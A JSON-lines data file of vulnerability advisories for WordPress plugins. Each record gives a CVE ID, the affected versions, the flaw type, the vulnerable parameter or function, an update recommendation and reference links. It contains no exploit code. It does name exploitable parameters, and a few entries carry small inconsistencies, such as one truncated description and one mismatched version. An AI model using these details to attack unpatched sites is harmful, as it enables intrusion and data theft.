{"CVE_ID":"CVE-2025-3614","slug":"elementskit-lite","versionImpact":"3.5.2","versionEndExcluding":"3.5.3","description":"The ElementsKit Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the URL attribute of a custom widget in all versions up to, and including, 3.5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.4.8\\\/modules\\\/widget-builder\\\/controls\\\/control-type-url.php#L9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.4.8\\\/modules\\\/widget-builder\\\/controls\\\/control-type-url.php#L9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.4.8\\\/modules\\\/widget-builder\\\/controls\\\/widget-writer.php#L366\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.4.8\\\/modules\\\/widget-builder\\\/controls\\\/widget-writer.php#L366\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1627e235-7836-43dc-a3f6-7f79da6ab229?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1627e235-7836-43dc-a3f6-7f79da6ab229?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4434","slug":"social-warfare","versionEndExcluding":"3.5.3","description":"The Social Warfare plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 3.5.2 via the 'swp_url' parameter. This allows attackers to execute code on the server.","recommendation":"Update to version 3.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98cf2a10-cc53-4479-87d1-71489f6a8c51?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98cf2a10-cc53-4479-87d1-71489f6a8c51?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/163680\\\/WordPress-Social-Warfare-3.5.2-Remote-Code-Execution.html\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/163680\\\/WordPress-Social-Warfare-3.5.2-Remote-Code-Execution.html\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4838","slug":"convertplug","versionImpact":"3.5.26","versionEndExcluding":"3.5.26.1","description":"The ConvertPlus plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.5.26 via deserialization of untrusted input from the 'settings_encoded' attribute of the 'smile_modal' shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 3.5.26.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/16f5a104-dce0-4249-91b9-67f99cce16d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/16f5a104-dce0-4249-91b9-67f99cce16d3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.convertplug.com\\\/plus\\\/\",\"name\":\"https:\\\/\\\/www.convertplug.com\\\/plus\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3240","slug":"convertplug","versionImpact":"3.5.25","versionEndExcluding":"3.5.26","description":"The ConvertPlug plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.5.25 via deserialization of untrusted input from the 'settings_encoded' attribute of the 'smile_info_bar' shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 3.5.26, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fca3259b-bf0e-4b4a-815f-1eb399b8b674?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fca3259b-bf0e-4b4a-815f-1eb399b8b674?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.convertplug.com\\\/plus\\\/product\\\/convertplug\\\/\",\"name\":\"https:\\\/\\\/www.convertplug.com\\\/plus\\\/product\\\/convertplug\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3237","slug":"convertplug","versionImpact":"3.5.25","versionEndExcluding":"3.5.26","description":"The ConvertPlug plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the cp_dismiss_notice() function in all versions up to, and including, 3.5.25. This makes it possible for authenticated attackers, with subscriber-level access and above, to update arbitrary option values to true.","recommendation":"Update to version 3.5.26, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cd72420-dca1-455d-92a6-a178b4b26eab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cd72420-dca1-455d-92a6-a178b4b26eab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.convertplug.com\\\/plus\\\/product\\\/convertplug\\\/\",\"name\":\"https:\\\/\\\/www.convertplug.com\\\/plus\\\/product\\\/convertplug\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5860","slug":"tickera-event-ticketing-system","versionImpact":"3.5.2.8","versionEndExcluding":"3.5.2.9","description":"The Tickera \u2013 WordPress Event Ticketing plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the tc_dl_delete_tickets AJAX action in all versions up to, and including, 3.5.2.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete all tickets associated with events.","recommendation":"Update to version 3.5.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d86aa41c-24df-49ec-b273-7bb57addddde?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d86aa41c-24df-49ec-b273-7bb57addddde?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3103413%40tickera-event-ticketing-system&new=3103413%40tickera-event-ticketing-system&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3103413%40tickera-event-ticketing-system&new=3103413%40tickera-event-ticketing-system&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8013","slug":"quttera-web-malware-scanner","versionImpact":"3.5.1.41","versionEndExcluding":"3.5.2.1","description":"The Quttera Web Malware Scanner plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 3.5.1.41 via the 'RunExternalScan' function. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 3.5.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quttera-web-malware-scanner\\\/trunk\\\/qtrAjaxHandler.php#L352\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quttera-web-malware-scanner\\\/trunk\\\/qtrAjaxHandler.php#L352\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quttera-web-malware-scanner\\\/trunk\\\/qtrExternalScanner.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quttera-web-malware-scanner\\\/trunk\\\/qtrExternalScanner.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3344330\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3344330\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40957153-45f1-40c9-91ce-f3491ca7eee5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40957153-45f1-40c9-91ce-f3491ca7eee5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7136","slug":"jet-search","versionImpact":"3.5.2","versionEndExcluding":"3.5.2.1","description":"The JetSearch plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 3.5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.5.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fe9fe85-bcb5-4e12-b879-31bc73074eed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fe9fe85-bcb5-4e12-b879-31bc73074eed?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/crocoblock.com\\\/plugins\\\/jetsearch\\\/\",\"name\":\"https:\\\/\\\/crocoblock.com\\\/plugins\\\/jetsearch\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4416","slug":"wp-mpdf","versionEndExcluding":"3.5.2","description":"The wp-mpdf plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.5.1. This is due to missing or incorrect nonce validation on the mpdf_admin_savepost() function. This makes it possible for unauthenticated attackers to save post data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c47386ee-25c8-4a77-92e8-5a82afc9c826?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c47386ee-25c8-4a77-92e8-5a82afc9c826?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2549363\\\/wp-mpdf\\\/trunk\\\/wp-mpdf.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2549363\\\/wp-mpdf\\\/trunk\\\/wp-mpdf.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10813","slug":"woo-product-table","versionImpact":"3.5.1","versionEndExcluding":"3.5.2","description":"The Product Table for WooCommerce by CodeAstrology (wooproducttable.com) plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.5.1 via the var_dump_table parameter. This makes it possible for unauthenticated attackers var data.","recommendation":"Update to version 3.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-table\\\/trunk\\\/inc\\\/shortcode-base.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-table\\\/trunk\\\/inc\\\/shortcode-base.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e67f680a-8942-45fa-8458-a27c78045aa1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e67f680a-8942-45fa-8458-a27c78045aa1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2186","slug":"wp-marketing-automations","versionImpact":"3.5.1","versionEndExcluding":"3.5.2","description":"The Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit plugin for WordPress is vulnerable to SQL Injection via the \u2018automationId\u2019 parameter in all versions up to, and including, 3.5.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-marketing-automations\\\/trunk\\\/includes\\\/api\\\/wc\\\/class-bwfan-api-get-automation-dynamic-coupon.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-marketing-automations\\\/trunk\\\/includes\\\/api\\\/wc\\\/class-bwfan-api-get-automation-dynamic-coupon.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257474\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257474\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88f8fa25-e3d5-4dfd-aae5-68b5880ffd53?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88f8fa25-e3d5-4dfd-aae5-68b5880ffd53?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7955","slug":"starbox","versionImpact":"3.5.1","versionEndExcluding":"3.5.2","description":"The Starbox  WordPress plugin before 3.5.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cbfcbe57-553d-490a-b7f3-48aa0022f63d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cbfcbe57-553d-490a-b7f3-48aa0022f63d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11154","slug":"revisionary","versionImpact":"3.5.15","versionEndExcluding":"3.5.16","description":"The PublishPress Revisions: Duplicate Posts, Submit, Approve and Schedule Content Changes plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.5.15 via the 'actAjaxRevisionDiffs' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive data including revisions of posts and pages.","recommendation":"Update to version 3.5.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c785b7a0-5091-4d89-87d3-cd7d9984553e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c785b7a0-5091-4d89-87d3-cd7d9984553e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/publishpress\\\/PublishPress-Revisions\\\/blob\\\/master\\\/admin\\\/history_rvy.php#L322\",\"name\":\"https:\\\/\\\/github.com\\\/publishpress\\\/PublishPress-Revisions\\\/blob\\\/master\\\/admin\\\/history_rvy.php#L322\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/revisionary\\\/trunk\\\/admin\\\/history_rvy.php#L322\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/revisionary\\\/trunk\\\/admin\\\/history_rvy.php#L322\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3192492\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3192492\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9436","slug":"revisionary","versionImpact":"3.5.14","versionEndExcluding":"3.5.15","description":"The PublishPress Revisions: Duplicate Posts, Submit, Approve and Schedule Content Changes plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.5.14. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.5.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/982bc924-1dcd-47b5-b15a-4ff0ad123ad1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/982bc924-1dcd-47b5-b15a-4ff0ad123ad1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/revisionary\\\/tags\\\/3.5.14\\\/admin\\\/class-list-table_rvy.php#L717\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/revisionary\\\/tags\\\/3.5.14\\\/admin\\\/class-list-table_rvy.php#L717\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165210\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165210\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/revisionary\\\/tags\\\/3.5.14\\\/admin\\\/class-list-table-archive.php#L780\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/revisionary\\\/tags\\\/3.5.14\\\/admin\\\/class-list-table-archive.php#L780\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6492","slug":"simple-sitemap","versionImpact":"3.5.13","versionEndExcluding":"3.5.14","description":"The Simple Sitemap \u2013 Create a Responsive HTML Sitemap plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.5.13. This is due to missing or incorrect nonce validation in the 'admin_notices' hook found in class-settings.php. This makes it possible for unauthenticated attackers to reset the plugin options to a default state via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.5.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a228e60c-c91b-4a82-8b05-a0ffaed82524?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a228e60c-c91b-4a82-8b05-a0ffaed82524?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099425\\\/simple-sitemap\\\/trunk\\\/lib\\\/classes\\\/plugin-admin-pages\\\/class-settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099425\\\/simple-sitemap\\\/trunk\\\/lib\\\/classes\\\/plugin-admin-pages\\\/class-settings.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6220","slug":"ultimate-addons-for-contact-form-7","versionImpact":"3.5.12","versionEndExcluding":"3.5.13","description":"The Ultra Addons for Contact Form 7 plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'save_options' function in all versions up to, and including, 3.5.12. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 3.5.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2025-6220\",\"name\":\"https:\\\/\\\/github.com\\\/d0n601\\\/CVE-2025-6220\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-contact-form-7\\\/trunk\\\/admin\\\/tf-options\\\/classes\\\/UACF7_Settings.php#L894-920\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-addons-for-contact-form-7\\\/trunk\\\/admin\\\/tf-options\\\/classes\\\/UACF7_Settings.php#L894-920\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288584\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288584\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2025-6220\\\/\",\"name\":\"https:\\\/\\\/ryankozak.com\\\/posts\\\/cve-2025-6220\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/697f3432-63b7-42d6-b188-812165cd2020?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/697f3432-63b7-42d6-b188-812165cd2020?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6077","slug":"ultimate-responsive-image-slider","versionImpact":"3.5.11","versionEndExcluding":"3.5.12","description":"The Slider WordPress plugin before 3.5.12 does not ensure that posts to be accessed via an AJAX action are slides and can be viewed by the user making the request, allowing any authenticated users, such as subscriber to access the content arbitrary post such as private, draft and password protected","recommendation":"Update to version 3.5.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1afc0e4a-f712-47d4-bf29-7719ccbbbb1b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1afc0e4a-f712-47d4-bf29-7719ccbbbb1b\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5678","slug":"kadence-blocks","versionImpact":"3.5.10","versionEndExcluding":"3.5.11","description":"The Gutenberg Blocks with AI by Kadence WP \u2013 Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018redirectURL\u2019 parameter in all versions up to, and including, 3.5.10 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.5.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/tags\\\/3.5.8\\\/includes\\\/assets\\\/js\\\/kb-countdown.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/tags\\\/3.5.8\\\/includes\\\/assets\\\/js\\\/kb-countdown.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/tags\\\/3.5.8\\\/includes\\\/blocks\\\/class-kadence-blocks-countdown-block.php#L605\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/tags\\\/3.5.8\\\/includes\\\/blocks\\\/class-kadence-blocks-countdown-block.php#L605\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc712f6b-f11b-4731-8f89-0044830400d6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fc712f6b-f11b-4731-8f89-0044830400d6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6348","slug":"smart-slider-3","versionImpact":"3.5.1.28","versionEndExcluding":"3.5.1.29","description":"The Smart Slider 3 plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018sliderid\u2019 parameter in all versions up to, and including, 3.5.1.28 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.5.1.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3332052\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3332052\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/188baddc-134c-4a82-898b-9b038e795893?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/188baddc-134c-4a82-898b-9b038e795893?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0660","slug":"smart-slider-3","versionEndExcluding":"3.5.1.14","description":"The Smart Slider 3 WordPress plugin before 3.5.1.14 does not properly validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3fe712bc-ce7f-4b30-9fc7-1ff15aa5b6ce\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3fe712bc-ce7f-4b30-9fc7-1ff15aa5b6ce\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4094","slug":"simple-share-buttons-adder","versionImpact":"3.5.0","versionEndExcluding":"3.5.1","description":"The Simple Share Buttons Adder WordPress plugin before 8.5.1 does not sanitise and escape some of its settings, which could allow high privilege users such as editors to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"Update to version 3.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04b2feba-e009-4fce-8539-5dfdb4300433\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04b2feba-e009-4fce-8539-5dfdb4300433\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
